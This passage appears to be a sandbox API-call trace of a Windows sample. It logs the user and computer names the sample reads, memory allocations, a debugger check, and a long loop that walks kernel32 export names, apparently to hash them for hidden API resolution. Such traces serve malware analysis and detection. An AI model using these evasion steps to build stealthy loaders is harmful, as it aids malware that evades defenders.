returned="EncryptFileA" [0030.847] GetUserNameW (in: lpBuffer=0x170000, pcbBuffer=0xc9ea8c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xc9ea8c) returned 1 [0030.850] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x180000 [0030.851] GetComputerNameW (in: lpBuffer=0x180000, nSize=0xc9ea8c | out: lpBuffer="XDUWTFONO", nSize=0xc9ea8c) returned 1 [0030.851] VirtualAlloc (lpAddress=0x0, dwSize=0x800, flAllocationType=0x3000, flProtect=0x4) returned 0x190000 [0030.851] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x1a0000 [0030.851] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x3000, flProtect=0x4) returned 0x1b0000 [0030.852] IsDebuggerPresent () returned 0 [0030.852] lstrlenA (lpString="kernel32.dll") returned 12 [0030.852] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0030.852] lstrcpyA (in: lpString1=0xc9dc14, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0030.852] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0030.852] lstrcpyA (in: lpString1=0xc9dc14, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0030.852] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0030.852] lstrcpyA (in: lpString1=0xc9dc14, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0030.853] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0030.853] lstrcpyA (in: lpString1=0xc9dc14, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0030.853] lstrlenA (lpString="ADDATOMA") returned 8 [0030.853] lstrcpyA (in: lpString1=0xc9dc14, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0030.853] lstrlenA (lpString="ADDATOMW") returned 8 [0030.853] lstrcpyA (in: lpString1=0xc9dc14, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0030.853] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0030.853] lstrcpyA (in: lpString1=0xc9dc14, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0030.853] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0030.853] lstrcpyA (in: lpString1=0xc9dc14, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0030.853] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0030.853] lstrcpyA (in: lpString1=0xc9dc14, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0030.853] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0030.853] lstrcpyA (in: lpString1=0xc9dc14, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0030.853] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0030.853] lstrcpyA (in: lpString1=0xc9dc14, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0030.853] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0030.853] lstrcpyA (in: lpString1=0xc9dc14, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0030.853] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0030.853] lstrcpyA (in: lpString1=0xc9dc14, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0030.853] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0030.853] lstrcpyA (in: lpString1=0xc9dc14, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0030.853] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0030.854] lstrcpyA (in: lpString1=0xc9dc14, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0030.854] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0030.854] lstrcpyA (in: lpString1=0xc9dc14, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0030.854] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0030.854] lstrcpyA (in: lpString1=0xc9dc14, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0030.854] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0030.854] lstrcpyA (in: lpString1=0xc9dc14, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0030.854] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0030.854] lstrcpyA (in: lpString1=0xc9dc14, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0030.854] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0030.854] lstrcpyA (in: lpString1=0xc9dc14, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0030.854] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0030.854] lstrcpyA (in: lpString1=0xc9dc14, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0030.854] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0030.854] lstrcpyA (in: lpString1=0xc9dc14, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0030.854] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0030.854] lstrcpyA (in: lpString1=0xc9dc14, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0030.854] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0030.854] lstrcpyA (in: lpString1=0xc9dc14, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0030.854] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0030.854] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0030.854] lstrlenA (lpString="BACKUPREAD") returned 10 [0030.854] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0030.854] lstrlenA (lpString="BACKUPSEEK") returned 10 [0030.854] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0030.854] lstrlenA (lpString="BACKUPWRITE") returned 11 [0030.854] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0030.854] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0030.854] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0030.854] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0030.854] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0030.854] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0030.854] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0030.854] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0030.855] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0030.855] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0030.855] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0030.855] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0030.855] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0030.855] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0030.855] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0030.855] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0030.855] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0030.855] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0030.855] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0030.855] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0030.855] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0030.855] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0030.855] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0030.855] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0030.855] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0030.855] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0030.855] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0030.855] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0030.855] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0030.855] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0030.855] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0030.855] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0030.855] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0030.855] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0030.855] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0030.855] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0030.855] lstrcpyA (in: lpString1=0xc9dc14, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0030.855] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0030.855] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0030.855] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0030.855] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0030.855] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0030.856] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0030.856] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0030.856] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0030.856] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0030.856] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0030.856] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0030.856] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0030.856] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0030.856] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0030.856] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0030.856] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0030.856] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0030.856] lstrcpyA (in: lpString1=0xc9dc14, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0030.856] lstrlenA (lpString="BEEP") returned 4 [0030.856] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0030.856] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0030.856] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0030.856] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0030.856] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0030.856] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0030.856] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0030.856] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0030.856] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0030.856] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0030.856] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0030.856] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0030.856] lstrcpyA (in: lpString1=0xc9dc14, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0030.856] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0030.856] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0030.856] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0030.856] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0030.856] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0030.856] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0030.856] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0030.857] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0030.857] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0030.857] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0030.857] lstrlenA (lpString="CANCELIO") returned 8 [0030.857] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0030.857] lstrlenA (lpString="CANCELIOEX") returned 10 [0030.857] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0030.857] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0030.857] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0030.857] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0030.857] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0030.857] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0030.857] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0030.857] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0030.857] lstrcpyA (in: lpString1=0xc9dc14, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0030.857] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0030.857] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0030.857] lstrlenA (lpString="CHECKELEVATION") returned 14 [0030.857] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0030.857] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0030.857] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0030.857] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0030.857] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0030.857] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0030.857] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0030.857] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0030.857] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0030.857] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0030.857] lstrcpyA (in: lpString1=0xc9dc14, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0030.857] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0030.857] lstrcpyA (in: lpString1=0xc9dc14, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0030.857] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0030.858] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0030.858] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0030.858] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0030.858] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0030.858] lstrcpyA (in: lpString1=0xc9dc14, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0030.858] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0030.858] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0030.858] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0030.858] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0030.858] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0030.858] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0030.858] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0030.858] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0030.858] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0030.858] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0030.858] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0030.858] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0030.858] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0030.858] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0030.858] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0030.858] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0030.858] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0030.858] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0030.858] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0030.858] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0030.858] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0030.858] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0030.858] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0030.858] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0030.858] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0030.858] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0030.858] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0030.858] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0030.858] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0030.859] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0030.859] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0030.859] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0030.859] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0030.859] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0030.859] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0030.859] lstrcpyA (in: lpString1=0xc9dc14, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0030.859] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0030.859] lstrcpyA (in: lpString1=0xc9dc14, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0030.859] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0030.859] lstrcpyA (in: lpString1=0xc9dc14, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0030.859] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0030.859] lstrcpyA (in: lpString1=0xc9dc14, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0030.859] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0030.859] lstrcpyA (in: lpString1=0xc9dc14, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0030.859] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0030.859] lstrcpyA (in: lpString1=0xc9dc14, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0030.859] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0030.859] lstrcpyA (in: lpString1=0xc9dc14, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0030.859] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0030.859] lstrcpyA (in: lpString1=0xc9dc14, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0030.859] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0030.859] lstrcpyA (in: lpString1=0xc9dc14, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0030.859] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0030.859] lstrcpyA (in: lpString1=0xc9dc14, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0030.859] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0030.859] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0030.859] lstrlenA (lpString="COPYCONTEXT") returned 11 [0030.859] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0030.859] lstrlenA (lpString="COPYFILEA") returned 9 [0030.859] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0030.859] lstrlenA (lpString="COPYFILEEXA") returned 11 [0030.859] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0030.859] lstrlenA (lpString="COPYFILEEXW") returned 11 [0030.860] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0030.860] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0030.860] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0030.860] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0030.860] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0030.860] lstrlenA (lpString="COPYFILEW") returned 9 [0030.860] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0030.860] lstrlenA (lpString="COPYLZFILE") returned 10 [0030.860] lstrcpyA (in: lpString1=0xc9dc14, 